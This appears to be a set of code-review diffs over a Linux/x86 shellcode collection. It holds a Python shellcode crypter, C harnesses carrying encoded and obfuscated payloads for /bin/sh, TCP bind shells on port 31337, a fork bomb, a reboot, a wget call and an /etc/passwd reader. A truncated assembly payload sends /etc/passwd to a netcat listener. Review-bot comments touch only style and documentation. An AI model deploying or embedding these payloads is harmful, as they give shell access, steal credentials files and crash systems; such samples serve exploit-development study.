crypted3 += r"\x46\x8b\x06\x83\xe8"
crypted3 += r"\x" + addByte
crypted3 += r"\x34"
crypted3 += r"\x" + xorByte
crypted3 += r"\x32\x46\xff\x88\x06\xe2\xf1\xeb\x05\xe8\xe7\xff\xff\xff"
crypted3 += crypted
crypted4 = crypted3.replace("\\x", ",0x")[1:]
crypted = '"' + crypted + '";'
crypted3 = '"'+ crypted3 + '";'
print("Uzumaki Shellcode Crypter - Swirling Everything")
print("http://hackingbits.com")
print("https://github.com/geyslan/SLAE.git")
print("License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n\n")
print("Crypted shellcode:\n")
print(crypted)
print()
print(crypted2)
print("\n\n")
print("Crypted shellcode with decrypter built-in:\n")
print(crypted3)
print()
print(crypted4)
print("\n\n")
print("Length: %d" % len(bytearray(shellcode)))
print("Length with decrypter: %d" % ((len(crypted3) - 2) / 4))
if __name__ == "__main__":
main()
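Review bot: The `getopt.getopt(sys.argv[1:], "ha:x:s:")` call in `main()` passes no long-option list, so `--help`, `--add`, `--xor` and `--shellcode`, which the usage text advertises and the `for o, a in opts` branches test for, all end in `GetoptError`. Pass `["help", "add=", "xor=", "shellcode="]` as the third argument. The `#!/usr/bin/python` shebang also deserves a look: the script relies on Python 3 behaviour (indexing the encoded `bytes` to get integers, the `surrogateescape` handler), so `python3` is the accurate interpreter, and the final `/ 4` should be `// 4` to keep the reported length an integer.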


@ -4,7 +4,7 @@
# Shellcode Author: Oleg Boytsev
# Tested on: Debian GNU/Linux 7/i686
# Shellcode Length: 58
# Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode
# EDB Note ~ Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode
global _start
section .text
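Review bot: The retitled `EDB Note ~ Command:` line still builds `x86_Linux_netcat_shellcode.c` with gcc, while the context lines right after it (`global _start`, `section .text`) are NASM source. Say in the note which file the command applies to, or give the assembler and linker commands for the listing that follows, so the header matches what a reader has to build.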


@ -1,32 +0,0 @@
/*
Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
Date : 10 Feb 2011
Author : kernel_panik
Thanks : cOokie, agix, antrhacks
*/
/*
xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f ;; hs//
push 0x6e69622f ;; nib/
mov ebx, esp
mov al, 11
int 0x80
*/
#include <stdio.h>
#include <string.h>
char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\xb0\x0b\xcd\x80";
int main(int argc, char **argv)
{
printf ("Shellcode length : %d bytes\n", strlen (code));
int(*f)()=(int(*)())code;
f();
}


@ -0,0 +1,86 @@
/*
Insertion Decoder Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
insertion_decoder_shellcode
* decoder has 33 bytes (the final amount depends on the shellcode length plus garbage bytes)
* null-free
* decodes any pattern of garbage insertion
Eg: True Byte = X, Garbage Byte = _
_ X _ X _ ...
X _ _ X X ...
X X X _ _ ...
# gcc -m32 -fno-stack-protector -z execstack insertion_decoder_shellcode.c -o insertion_decoder_shellcode
Testing
# ./insertion_decoder_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
// Shellcode Decoder (33 bytes)
"\xeb\x1a\x5e\x8d\x3e\x31\xc9\x8b\x1c\x0e"
"\x41\x66\x81\xfb"
"\xf1\xf1" // <- End Signature
"\x74\x0f\x80\xfb"
"\x3f" // <- Garbage Byte
"\x74\xf0\x88\x1f\x47\xeb\xeb\xe8\xe1\xff"
"\xff\xff"
// Encoded shellcode (length depends of the shellcode plus garbage bytes)
"\x3f\x3f\x3f\x31\x3f\xc9\x3f\xf7\xe1\x3f"
"\xb0\x0b\x3f\x51\x68\x3f\x2f\x2f\x3f\x73"
"\x68\x3f\x68\x2f\x3f\x62\x69\x3f\x6e\x89"
"\x3f\xe3\xcd\x3f\x80\xf1\xf1";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}
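Review bot: In `main`, the comment "When contains null bytes, printf will show a wrong shellcode length" blames the wrong function: it is `strlen` that stops at the first NUL byte. `strlen(shellcode)` is also handed an `unsigned char[]` and its `size_t` result is printed with `%d`. Use `sizeof(shellcode) - 1` with `%zu`, which is correct for any byte content, and reword the comment.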


@ -0,0 +1,70 @@
/*
Tiny Execve sh Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
*/
/*
tiny_execve_sh_shellcode
* 21 bytes
* null-free
# gcc -m32 -fno-stack-protector -z execstack tiny_execve_sh_shellcode.c -o tiny_execve_sh_shellcode
Testing
# ./tiny_execve_sh_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
"\x80";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}
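Review bot: `main ()` is declared without a return type and returns no value. Implicit `int` was removed in C99, so current compilers warn about or reject this harness; declare `int main(void)` and end it with `return 0;`.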


@ -0,0 +1,74 @@
/*
Tiny Read File Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
tiny_read_file_shellcode
* 51 bytes
* null-free
* read 4096 bytes from /etc/passwd file
# gcc -m32 -fno-stack-protector -z execstack tiny_read_file_shellcode.c -o tiny_read_file_shellcode
Testing
# ./tiny_read_file_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\xb0\x05\x51\x68\x73\x73"
"\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f"
"\x65\x74\x89\xe3\xcd\x80\x93\x91\xb0\x03"
"\x31\xd2\x66\xba\xff\x0f\x42\xcd\x80\x92"
"\x31\xc0\xb0\x04\xb3\x01\xcd\x80\x93\xcd"
"\x80";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}


@ -0,0 +1,75 @@
/*
Mutated Reboot Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see &t;http://www.gnu.org/licenses/>.
*/
/*
mutated_reboot_shellcode
* 55 bytes
* null-free
* mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)
# gcc -m32 -fno-stack-protector -z execstack mutated_reboot_shellcode.c -o mutated_reboot_shellcode
Testing
* Only run it in a Virtual Machine!!! Your system will crash. Use at your own risk!
* To work properly, you must be su!
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x29\xff\x74\x01\xe8\x83\xc7\x24\x97\xeb"
"\x01\xe1\xcd\x80\xeb\x01\xff\x6a\x29\x59"
"\xeb\x01\x01\xbb\x67\x45\x23\x01\xba\xca"
"\x9b\xc2\xff\x31\xda\x75\x01\xe7\x87\xda"
"\x8d\x41\x2f\x8d\x89\x40\x19\x12\x28\xeb"
"\x02\xe8\x01\xcd\x80";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}
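Review bot: The last line of the licence header reads `see &t;http://www.gnu.org/licenses/>.`; the `&t;` is a damaged HTML entity where `<` belongs. Restore the `<` so the notice matches the standard GPL text. The Testing section also gives two warnings but no run command, although the build line above it produces `mutated_reboot_shellcode`.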


@ -0,0 +1,70 @@
/*
Mutated Fork Bomb Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
mutated_fork_bomb_shellcode
* 15 bytes
* null-free
* mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)
# gcc -m32 -fno-stack-protector -z execstack mutated_fork_bomb_shellcode.c -o mutated_fork_bomb_shellcode
Testing
* Only run it in a Virtual Machine!!! Your system will crash. Use at your own risk!
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x31\xff\xeb\x01\xe8\xb2\x1d\x97\x83\xe8"
"\x1b\xcd\x80\xeb\xf1";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}


@ -0,0 +1,78 @@
/*
Mutated Execve Wget Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
mutated_execve_wget_shellcode
* 96 bytes
* null-free
* mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)
# gcc -m32 -fno-stack-protector -z execstack mutated_execve_wget_shellcode.c -o mutated_execve_wget_shellcode
Testing
# ./mutated_execve_wget_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\xeb\x01\xe8\x29\xdb\x74\x01\x83\xf7\xe3"
"\xbd\xf5\xff\xff\xff\xeb\x01\xe8\x68\x41"
"\x65\x45\x72\x29\xf6\x74\x01\x83\x5e\x56"
"\x81\xf6\x25\x4a\x1f\x3e\x56\xeb\x01\x33"
"\x68\x69\x73\x2e\x67\x89\x44\x24\x0c\x89"
"\xe1\x6a\x74\xeb\x01\xe3\x68\x2f\x77\x67"
"\x65\xeb\x01\x83\x68\x2f\x62\x69\x6e\xeb"
"\x01\x33\x68\x2f\x75\x73\x72\x8d\x1c\x24"
"\xeb\x01\x83\x50\x51\x53\x89\xe1\xf7\xdd"
"\x95\xeb\x01\x83\xcd\x80";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}
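Review bot: The header block documents size, null-freeness and the mutation caveat, but not what the payload does beyond its name: nothing states which arguments `wget` is run with, and the Testing step tells the reader to execute the binary. Add a line describing the command and the network request it makes, so that someone auditing the sample or running it in a lab knows what to expect.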


@ -0,0 +1,82 @@
/*
Uzumaki Decrypter Shellcode - C Language - Linux/x86
Copyright (C) 2013 Geyslan G. Bem, Hacking bits
http://hackingbits.com
geyslan@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*
uzumaki_decrypter_shellcode
* decrypter has 29 bytes (the final amount depends on the shellcode length)
* it decrypts the uzumaki cipher, a custom stream cipher algorithm ( (XOR [static] and XOR [pseudorandom]), ADD [static] )
* to encrypt the shellcode use the Uzumaki Crypter <https://github.com/geyslan/SLAE/blob/master/7th.assignment/uzumaki_crypter.py>
* null-free
# gcc -m32 -fno-stack-protector -z execstack uzumaki_decrypter_shellcode.c -o uzumaki_decrypter_shellcode
Testing
# ./uzumaki_decrypter_shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
// Shellcode Decrypter
"\x29\xc9\x74\x14\x5e\xb1"
"\x14" // <- shellcode length
"\x46\x8b\x06\x83\xe8"
"\x09" // <- ADD key
"\x34"
"\x9f" // <- XOR key
"\x32\x46\xff\x88\x06\xe2\xf1\xeb\x05\xe8"
"\xe7\xff\xff\xff"
// Crypted Shellcode
"\x31\x70\xaa\x92\xd7\x2d\xce\xaf\xe1\xa8"
"\xcc\x8d\xa8\xe1\xdb\x9d\xa1\x81\xfe\xba"
"\xdb";
main ()
{
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Pollutes all registers ensuring that the shellcode runs in any circumstance.
__asm__ ("movl $0xffffffff, %eax\n\t"
"movl %eax, %ebx\n\t"
"movl %eax, %ecx\n\t"
"movl %eax, %edx\n\t"
"movl %eax, %esi\n\t"
"movl %eax, %edi\n\t"
"movl %eax, %ebp\n\t"
// Calling the shellcode
"call shellcode");
}
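Review bot: The inline comment on `"\x14"` says "shellcode length", but the crypted payload below it is 21 bytes (0x15), so the value stored there is the payload length minus one. Reword the comment to say so; as written, a reader checking the sample against its header will count a mismatch.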


@ -0,0 +1,100 @@
/*
Title : tcpbindshell (108 bytes)
Date : 15 May 2013
Author : Russell Willis <codinguy@gmail.com>
Testd on: Linux/x86 (SMP Debian 3.2.41-2 i686)
$ objdump -D tcpbindshell -M intel
tcpbindshell: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 db xor ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 31 d2 xor edx,edx
8048068: b0 66 mov al,0x66
804806a: b3 01 mov bl,0x1
804806c: 51 push ecx
804806d: 6a 06 push 0x6
804806f: 6a 01 push 0x1
8048071: 6a 02 push 0x2
8048073: 89 e1 mov ecx,esp
8048075: cd 80 int 0x80
8048077: 89 c6 mov esi,eax
8048079: b0 66 mov al,0x66
804807b: b3 02 mov bl,0x2
804807d: 52 push edx
804807e: 66 68 7a 69 pushw 0x697a
8048082: 66 53 push bx
8048084: 89 e1 mov ecx,esp
8048086: 6a 10 push 0x10
8048088: 51 push ecx
8048089: 56 push esi
804808a: 89 e1 mov ecx,esp
804808c: cd 80 int 0x80
804808e: b0 66 mov al,0x66
8048090: b3 04 mov bl,0x4
8048092: 6a 01 push 0x1
8048094: 56 push esi
8048095: 89 e1 mov ecx,esp
8048097: cd 80 int 0x80
8048099: b0 66 mov al,0x66
804809b: b3 05 mov bl,0x5
804809d: 52 push edx
804809e: 52 push edx
804809f: 56 push esi
80480a0: 89 e1 mov ecx,esp
80480a2: cd 80 int 0x80
80480a4: 89 c3 mov ebx,eax
80480a6: 31 c9 xor ecx,ecx
80480a8: b1 03 mov cl,0x3
080480aa <dupfd>:
80480aa: fe c9 dec cl
80480ac: b0 3f mov al,0x3f
80480ae: cd 80 int 0x80
80480b0: 75 f8 jne 80480aa
80480b2: 31 c0 xor eax,eax
80480b4: 52 push edx
80480b5: 68 6e 2f 73 68 push 0x68732f6e
80480ba: 68 2f 2f 62 69 push 0x69622f2f
80480bf: 89 e3 mov ebx,esp
80480c1: 52 push edx
80480c2: 53 push ebx
80480c3: 89 e1 mov ecx,esp
80480c5: 52 push edx
80480c6: 89 e2 mov edx,esp
80480c8: b0 0b mov al,0xb
80480ca: cd 80 int 0x80
*/
#include <stdio.h>
/*
Port High/Low bytes
Current port 31337 (7a69)
*/
#define PORTHL "\x7a\x69"
unsigned char code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66"
"\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89"
"\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52"
"\x66\x68"PORTHL"\x66\x53\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04"
"\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3"
"\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3"
"\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80"
"\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
"\xe1\x52\x89\xe2\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}
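Review bot: The header gives an objdump listing but no build command, and `Testd on` is misspelled. The listing is `elf32-i386`, so state the compiler invocation, including the 32-bit target, in the header next to the test platform.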


@ -0,0 +1,69 @@
/*
In The Name of G0D
Linux/x86 - Set '/proc/sys/net/ipv4/ip_forward' to '0' & exit()
Size : 83 Bytes
fun for routers ;)
Author : By Hamid Zamani (aka HAMIDx9)
Member of ^^Ashiyane Digital Security Team^^
Disassembly of section .text:
08048054 <_start>:
8048054: 31 c0 xor %eax,%eax
8048056: 50 push %eax
8048057: 68 77 61 72 64 push $0x64726177
804805c: 68 5f 66 6f 72 push $0x726f665f
8048061: 68 34 2f 69 70 push $0x70692f34
8048066: 68 2f 69 70 76 push $0x7670692f
804806b: 68 2f 6e 65 74 push $0x74656e2f
8048070: 68 73 79 73 2f push $0x2f737973
8048075: 68 72 6f 63 2f push $0x2f636f72
804807a: 66 68 2f 70 pushw $0x702f
804807e: 89 e3 mov %esp,%ebx
8048080: 31 c9 xor %ecx,%ecx
8048082: b1 01 mov $0x1,%cl
8048084: b0 05 mov $0x5,%al
8048086: cd 80 int $0x80
8048088: 89 c3 mov %eax,%ebx
804808a: 31 c9 xor %ecx,%ecx
804808c: 51 push %ecx
804808d: 6a 30 push $0x30
804808f: 89 e1 mov %esp,%ecx
8048091: 31 d2 xor %edx,%edx
8048093: b2 01 mov $0x1,%dl
8048095: b0 04 mov $0x4,%al
8048097: cd 80 int $0x80
8048099: 31 c0 xor %eax,%eax
804809b: 83 c0 06 add $0x6,%eax
804809e: cd 80 int $0x80
80480a0: 31 c0 xor %eax,%eax
80480a2: 40 inc %eax
80480a3: 31 db xor %ebx,%ebx
80480a5: cd 80 int $0x80
*/
#include <stdio.h>
int main(int argc,char **argv)
{
char shellcode[] = "\x31\xc0\x50\x68\x77\x61\x72\x64\x68"
"\x5f\x66\x6f\x72\x68\x34\x2f\x69\x70"
"\x68\x2f\x69\x70\x76\x68\x2f\x6e\x65"
"\x74\x68\x73\x79\x73\x2f\x68\x72\x6f"
"\x63\x2f\x66\x68\x2f\x70\x89\xe3\x31"
"\xc9\xb1\x01\xb0\x05\xcd\x80\x89\xc3"
"\x31\xc9\x51\x6a\x30\x89\xe1\x31\xd2"
"\xb2\x01\xb0\x04\xcd\x80\x31\xc0\x83"
"\xc0\x06\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80";
printf("Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
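Review bot: `main` calls `strlen(shellcode)` but the file includes only `<stdio.h>`, so the call has no prototype in scope. Add `#include <string.h>`.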


@ -0,0 +1,59 @@
/*
Title : egghunter shellcode
: hunter (30 bytes), marker (8 bytes), shellcode (28 bytes)
Date : 28 May 2013
Author : Russell Willis <codinguy@gmail.com>
Testd on: Linux/x86 (SMP Debian 3.2.41-2 i686)
Comments:
Using sigaction system call for hunter code for robust operation.
Based on paper 'Safely Searching Process Virtual Address Space'.
This is a must read paper, instructive and inspiring, found here:
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
see section 3.1.3 sigaction(2), page 13.
To build:
gcc -fno-stack-protector -z execstack egghunter.c -o egghunter
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
* Marker code must be executable, currently:
* /x90 nop
* /x50 push eax
*/
#define MARKER "\x90\x50"
char hunter[] =
"\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1"
"\xb8"MARKER""MARKER"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";
char marker[] = MARKER;
char shellcode[] =
"\x31\xc0\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80";
int
main(void)
{
int i=0, nmarkers = 4, markerlen = sizeof(marker)-1;
/*
* Setup area of memory for testing,
* place marker and shellcode into area.
*/
char *egg = malloc(128);
memcpy(egg+(markerlen*nmarkers), shellcode, sizeof(shellcode)-1);
do {
memcpy(egg+i, marker, markerlen);
i += markerlen;
} while(i != (markerlen * nmarkers));
/*
* Run hunter to search for marker and jump to shellcode
*/
int (*ret)() = (int(*)())hunter;
ret();
free(egg);
return 0;
}
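Review bot: `malloc(128)` is not checked before the `memcpy` calls write through `egg`; return early when it is NULL. In the marker comment, `/x90` and `/x50` should use backslashes to match the `MARKER` definition.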


@ -0,0 +1,41 @@
/*
Title : Obfuscated execve /bin/sh (30 bytes)
Date : 3rd July 2013
Author : Russell Willis <codinguy@gmail.com>
System : Linux/x86 (SMP Debian 3.2.41-2 i686)
To build:
gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
00000000 31C9 xor ecx,ecx
00000002 F7E9 imul ecx
00000004 51 push ecx
00000005 040B add al,0xb
00000007 EB08 jmp short 0x11
00000009 5E pop esi
0000000A 87E6 xchg esp,esi
0000000C 99 cdq
0000000D 87DC xchg ebx,esp
0000000F CD80 int 0x80
00000011 E8F3FFFFFF call dword 0x9
00000016 2F das
00000017 62696E bound ebp,[ecx+0x6e]
0000001A 2F das
0000001B 2F das
0000001C 7368 jnc 0x86
*/
#include <stdio.h>
unsigned char code[] = \
"\x31\xc9\xf7\xe9\x51\x04\x0b\xeb\x08\x5e\x87\xe6\x99\x87\xdc\xcd\x80"
"\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
main()
{
printf("Shellcode Length: %d\n", sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}
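Review bot: In the disassembly comment, offsets 0x16 to 0x1C are the bytes of the string `/bin//sh`, yet they are listed as instructions (`das`, `bound`, `jnc`). Mark that range as data so a reader following the listing does not take it for code.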


@ -0,0 +1,90 @@
/*
Title : Obfuscated tcp bind shell (112 bytes)
Date : 3 July 2013
Author : Russell Willis <codinguy@gmail.com>
System : Linux/x86 (SMP Debian 3.2.41-2 i686)
To build:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
00000000 D9EE fldz
00000002 9BD97424F4 fstenv [esp-0xc]
00000007 5D pop ebp
00000008 8D6D59 lea ebp,[ebp+0x59]
0000000B 31DB xor ebx,ebx
0000000D F7EB imul ebx
0000000F FEC3 inc bl
00000011 51 push ecx
00000012 6A06 push byte +0x6
00000014 6A01 push byte +0x1
00000016 6A02 push byte +0x2
00000018 FFD5 call ebp
0000001A 89C6 mov esi,eax
0000001C FEC3 inc bl
0000001E 52 push edx
0000001F 66687A69 push word 0x697a
00000023 6653 push bx
00000025 89E1 mov ecx,esp
00000027 6A10 push byte +0x10
00000029 51 push ecx
0000002A 56 push esi
0000002B FFD5 call ebp
0000002D B304 mov bl,0x4
0000002F 6A01 push byte +0x1
00000031 56 push esi
00000032 FFD5 call ebp
00000034 B305 mov bl,0x5
00000036 52 push edx
00000037 52 push edx
00000038 56 push esi
00000039 FFD5 call ebp
0000003B 89C3 mov ebx,eax
0000003D 31C9 xor ecx,ecx
0000003F B103 mov cl,0x3
00000041 FEC9 dec cl
00000043 B03F mov al,0x3f
00000045 CD80 int 0x80
00000047 75F8 jnz 0x41
00000049 31DB xor ebx,ebx
0000004B F7E3 mul ebx
0000004D 51 push ecx
0000004E EB13 jmp short 0x63
00000050 5E pop esi
00000051 87E6 xchg esp,esi
00000053 87DC xchg ebx,esp
00000055 B00B mov al,0xb
00000057 CD80 int 0x80
00000059 5F pop edi
0000005A 6A66 push byte +0x66
0000005C 58 pop eax
0000005D 89E1 mov ecx,esp
0000005F CD80 int 0x80
00000061 57 push edi
00000062 C3 ret
00000063 E8E8FFFFFF call dword 0x50
00000068 2F das
00000069 62696E bound ebp,[ecx+0x6e]
0000006C 2F das
0000006D 2F das
0000006E 7368 jnc 0xd8
*/
#include <stdio.h>
unsigned char code[] = \
"\xd9\xee\x9b\xd9\x74\x24\xf4\x5d\x8d\x6d\x59\x31\xdb\xf7"
"\xeb\xfe\xc3\x51\x6a\x06\x6a\x01\x6a\x02\xff\xd5\x89\xc6"
"\xfe\xc3\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51"
"\x56\xff\xd5\xb3\x04\x6a\x01\x56\xff\xd5\xb3\x05\x52\x52"
"\x56\xff\xd5\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd"
"\x80\x75\xf8\x31\xdb\xf7\xe3\x51\xeb\x13\x5e\x87\xe6\x87"
"\xdc\xb0\x0b\xcd\x80\x5f\x6a\x66\x58\x89\xe1\xcd\x80\x57"
"\xc3\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
main()
{
printf("Shellcode Length: %d\n", sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}
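
Review bot: the header gives title, date, author and build line but never names the listening port, which appears only in `push word 0x697a` at offset 0x1F. That push stores the bytes `7a 69` in the port field, which is TCP 31337 in network byte order, and the `push edx` before it leaves the address field zero, so the socket listens on every interface. Put both facts in the header so anyone triaging the sample knows which listener to look for.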

@ -0,0 +1,98 @@
/*
; Author: Daniel Sauder
; Website: http://govolution.wordpress.com/about
; License http://creativecommons.org/licenses/by-sa/3.0/
; Shellcode reads /etc/passwd and sends the content to 127.1.1.1 port 12345.
; The file can be recieved using netcat:
; $ nc -l 127.1.1.1 12345
section .text
global _start
_start:
; socket
push BYTE 0x66 ; socketcall 102
pop eax
xor ebx, ebx
inc ebx
xor edx, edx
push edx
push BYTE 0x1
push BYTE 0x2
mov ecx, esp
int 0x80
mov esi, eax
; connect
push BYTE 0x66
pop eax
